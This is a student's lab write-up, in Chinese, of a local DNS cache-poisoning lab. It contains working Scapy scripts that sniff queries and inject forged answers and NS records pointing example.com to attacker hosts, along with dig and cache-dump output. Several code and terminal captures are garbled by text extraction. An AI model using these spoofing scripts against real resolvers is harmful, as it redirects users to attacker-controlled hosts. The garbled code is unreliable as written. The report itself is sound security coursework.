Local DNS Attack Lab

57118213 陈洪杰

Task1

实验利用用户会先接受来的较早的报文的原理来进行攻击行为。首先在 router 上增加出网流量延迟, 预防欺骗报文来的比合法报文迟的情况。

```
root@4c48e25a54f9:/# tc qdisc add dev eth0 root netem delay 100ms root@4c48e25a54f9:/# ■
```

查看本机配置情况,用于完成过滤条件等,如下。

所用攻击代码如下。

在未运行攻击代码时,在 user 上 dig 某网址,看到 answer 的网址是正常网址 93.184.216.34.

```
root@87b01fc9aa75:/# dig www.example.com
; <<>> DiG 9.16.1-Ubuntu <<>> www.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18436
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 675c531462a07e9e0100000060f554599e9a051135720f5a (good)
;; QUESTION SECTION:
;www.example.com.
                                ΙN
;; ANSWER SECTION:
                        86400
                                IN
                                                93.184.216.34
www.example.com.
;; Query time: 4279 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 10:30:49 UTC 2021
;; MSG SIZE rcvd: 88
root@87b01fc9aa75:/#
```

接着. 去 dns 服务器上清空一下缓存. 如下。

```
root@afc5da427a32:/# rndc flush root@afc5da427a32:/#
```

然后,在 attacker 上运行攻击代码,此时终端没有响应,接着到 user 上在 dig 该网址,此时 answer 的网址变成了 1.2.3.4, 为伪造的网址。

```
root@VM:/volumes# python3 task1.py
10.9.0.5 --> 10.9.0.53: 54629
                                                                         root@87b01fc9aa75:/# dig www.example.com
                                                                         ; <<>> DiG 9.16.1-Ubuntu <<>> www.example.com
Sent 1 packets.
                                                                         :: global options: +cmd
                                                                        ,, dot dniser:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54629
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
                                                                         ;; QUESTION SECTION:
                                                                         :www.example.com.
                                                                                                                              Α
                                                                        :: ANSWER SECTION:
                                                                          ww.example.com.
                                                                                                        259200 IN
                                                                                                                              Α
                                                                                                                                         1.2.3.4
                                                                         ;; Query time: 67 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
                                                                        ;; WHEN: Mon Jul 19 10:43:00 UTC 2021
;; MSG SIZE rcvd: 64
                                                                        root@87b01fc9aa75:/#
```

Task2

task1 的攻击目标是用户,因此每当用户查询某一网址时,都需要返回一个欺骗报文,为了提高效率,下面将直接攻击 dns 服务器缓存,

这样一段时间内,就可以不用不断发送欺骗报文了。

攻击代码如下。

```
1 from scapy.all import *
2 NS_NAME = "www.example.com"
3 def spoof_dns(pkt):
4     if(DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):
5     print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))
6          IPpkt=IP(dst=pkt[IP].src,src=pkt[IP].dst)
7          UDPpkt=UDP(dport=pkt[UDP].sport,sport=53)
8          Anssec=DNSRR[rrname=pkt[DNS].qd.qname,type='A',rdata='1.2.3.4',ttl=259200]
9          DNSpkt=DNS(id=pkt[DNS].id,qd=pkt[DNS].qd.aa=1,rd=0,qdcount=1,qr=1,ancount=1,an=Anssec)
10          spoofpkt=IPpkt/UDPpkt/DNSpkt
11          send(spoofpkt)
12
13 pkt=sniff(iface='br-ca5656a39c6c',filter='udp and (src host 10.9.0.53 and dst port 53)',prn=spoof_dns)
```

去 dns 服务器上清空一下缓存。

```
root@afc5da427a32:/# rndc flush
root@afc5da427a32:/#
```

运行攻击代码,情况同 Task1.

然后在 dns 服务器上使用 rndc dumpdb -cache 下载缓存,并用如下命令查看,发现缓存已经被修改。

```
root@afc5da427a32:/# cat /var/cache/bind/dump.db | grep example example.com. 777562 NS a.iana-servers.net. www.example.com. 863964 A 1.2.3.4 root@afc5da427a32:/#
```

Task3

上述攻击只影响到 www.example.com 这一个主机名,下面将攻击整个 example.com 内的主机名。

攻击代码如下,新增了 NSsec 这一行。

清空 dns 服务器缓存,攻击步骤同上。

```
root@VM:/volumes# python3 task3.py
10.9.0.53 --> 199.43.135.53: 33548
.
Sent 1 packets.

| Got answer:
| ;; shead potions: +cmd
| ;; Got answer:
| ;; -> HEADER<- opcode: QUERY, status: NOERROR, id: 19956
| ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
| ;; OPT PSEUDOSECTION:
| ; EDNS: version: 0, flags:; udp: 4096
| ; COOKIE: cb688c4746871f5d01000000060f559a320db04cc0fc81a3c (good)
| ;; QUESTION SECTION:
| www.example.com. IN A
| ;; ANSWER SECTION:
| www.example.com. 259200 IN A 1.2.3.4
| ;; Query time: 4599 msec
| ;; SERVER: 10.9.0.53#53(10.9.0.53)
| ;; WHEN: Mon Jul 19 10:53:23 UTC 2021
| ;; MSG SIZE rcvd: 88
| root@87b01fc9aa75:/# ■
```

这时,在用户上再 dig 一下 example.com 里面的其他主机名,如 mail.example.com,发现 answer 地址也被修改,如下。

```
root@87b01fc9aa75:/# dig mail.example.com
; <>>> DiG 9.16.1-Ubuntu <>>> mail.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47404
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: b28822cb7076f6210100000060f55b3d40a9ca1571264657 (good)
;; QUESTION SECTION:
;mail.example.com.
                                 IN
                                         Α
;; ANSWER SECTION:
mail.example.com.
                        259200
                                ΙN
                                         Α
                                                 1.2.3.6
;; Query time: 8 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 11:00:13 UTC 2021
;; MSG SIZE rcvd: 89
root@87b01fc9aa75:/#
```

这时查看一下 dns 服务器缓存、发现这两个的地址都被修改了。

```
root@afc5da427a32:/# cat /var/cache/bind/dump.db | grep example e

example.com. 777543 NS ns.attacker32.com. mail.example.com. 863955 A 1.2.3.6 www.example.com. 863945 A 1.2.3.4 root@afc5da427a32:/#
```

Task4

上述攻击成功修改了 example.com 的权威域名服务器。下面攻击尝试将该域名服务器用于其他网址。

攻击代码如下,修改了 NSsec1, NSsec2 和 DNSpkt 这几行。

攻击方式同上。

```
root@VM://osktop

root@VM://osktop

root@VM://osktop

root@87b01fc9aa75:/# 

seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osktop

root@87b01fc9aa75:/# 
seed@VM:-/Osk
```

看一下 dns 服务器的缓存,发现里面并没有 google 的记录。因为如果这条记录被接受了,ns.attacker32.com 就会成为 google.com 的权威域名服务器,而 www.example.com 显然不在 google.com 里面,这显然是不安全的,所以本地 DNS 服务器没有接受。

```
root@afc5da427a32:/# rndc dumpdb -cache
root@afc5da427a32:/# cat /var/cache/bind/dump.db | grep google
root@afc5da427a32:/# cat /var/cache/bind/dump.db | grep example
example.com. 777528 NS ns.attacker32.com.
www.example.com. 863930 A 1.2.3.4
root@afc5da427a32:/#
```

Task5

攻击代码如下,修改了 NSsec2, Addsec1, Addsec2, Addsec3 和 DNSpkt 这几行。

```
1 from scapy.all import
2 NS_NAME = "www.example
      3 def spoof_dns(pkt):
                                        if(DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode('utf-8')):
    print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))
    IPpkt=IP(dst=pkt[IP].src,src=pkt[IP].dst)
                                                                      IPpkt=IP(dst=pkt[IP].src,src=pkt[IP].dst)
UDPpkt=UDP(dport=pkt[UDP].sport,sport=53)
Anssec=DNSRR(rrname=pkt[DNS].qd.qname,type='A',rdata='1.2.3.4',ttl=259200)
NSsec1=DNSRR(rrname="example.com",type='NS',rdata='ns.attacker32.com',ttl=259200)
NSsec2=DNSRR(rrname="example.com",type='NS',rdata='ns.example.com',ttl=259200)
Addsec1 = DNSRR(rrname='ns.attacker32.com', type='A',ttl=259200, rdata='1.2.3.4')
Addsec2 = DNSRR(rrname='ns.example.com', type='A',ttl=259200, rdata='5.6.7.8')
Addsec3 = DNSRR(rrname='www.facebook.com', type='A',ttl=259200, rdata='3.4.5.6')
          DNSpkt=DNS (id=pkt[DNS].id, qd=pkt[DNS].id, 
        NSsec2, ar=Addsec1/Addsec2/Addsec3)
                                                                         spoofpkt=IPpkt/UDPpkt/DNSpkt
                                                                       send(spoofpkt)
18 pkt=sniff(iface='br-ca5656a39c6c',filter='udp and (src host 10.9.0.53 and dst port 53)',prn=spoof_dns)
攻击过程同上。
root@VM:/volumes# python3 task5.py
10.9.0.53 --> 199.43.133.53: 59960
                                                                                                                                                                                                  root@87b01fc9aa75:/# dig www.example.com
                                                                                                                                                                                                            <>>> DiG 9.16.1-Ubuntu <<>> www.example.com
                                                                                                                                                                                                   ;; global options: +cmd
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35953
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
Sent 1 packets.
                                                                                                                                                                                                    ;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 240bb360fb6732ae0100000060f577dadb33611423e9dcdf (good)
                                                                                                                                                                                                       ;; QUESTION SECTION:
                                                                                                                                                                                                      ;www.example.com.
                                                                                                                                                                                                      ;; ANSWER SECTION:
                                                                                                                                                                                                         ww.example.com.
                                                                                                                                                                                                                                                                                              259200 IN
                                                                                                                                                                                                                                                                                                                                                                                           1.2.3.4
                                                                                                                                                                                                      ;; Query time: 4428 msec
                                                                                                                                                                                                      ;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 13:02:18 UTC 2021
;; MSG SIZE rcvd: 88
                                                                                                                                                                                                     root@87b01fc9aa75:/#
```

查看 dns 服务器缓存,发现 ns.example.com 和 ns.attacker32.com 都成了 example.com 的权威域名服务器。

```
; authauthority example.com. 777568 NS ns.example.com. 777568 NS ns.attacker32.com.
```

ns.example.com 成了附加部分且地址是 5.6.7.8。

```
; additional ns.example.com. 863986 A 5.6.7.8 ; authanswer www.example.com. 863986 A 1.2.3.4
```

而 facebook 依然找不到。

```
root@afc5da427a32:/# cat /var/cache/bind/dump.db | grep facebook
root@afc5da427a32:/#
```

这时查一下 ns.example.com, 但是得到的回复却不是缓存中的 5.6.7.8, 因为本地 dns 服务器虽然缓存了这个信息, 但是因为安全原因, 它并不信任附加部分这些信息, 而是重新发送 DNS 请求获得了真正的 IP 地址。

```
root@87b01fc9aa75:/# dig ns.example.com
; <<>> DiG 9.16.1-Ubuntu <<>> ns.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57557
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; C00KIE: 553a61e4c90484e90100000060f58aea016bbaa647b3163c (good)
;; QUESTION SECTION:
                                        IN
;ns.example.com.
;; ANSWER SECTION:
ns.example.com.
                        259200 IN
                                        Α
                                                 10.9.0.153
;; Query time: 12 msec
;; SERVER: 10.9.0.53#53(10.9.0.53)
;; WHEN: Mon Jul 19 14:23:38 UTC 2021
;; MSG SIZE rcvd: 87
root@87b01fc9aa75:/#
```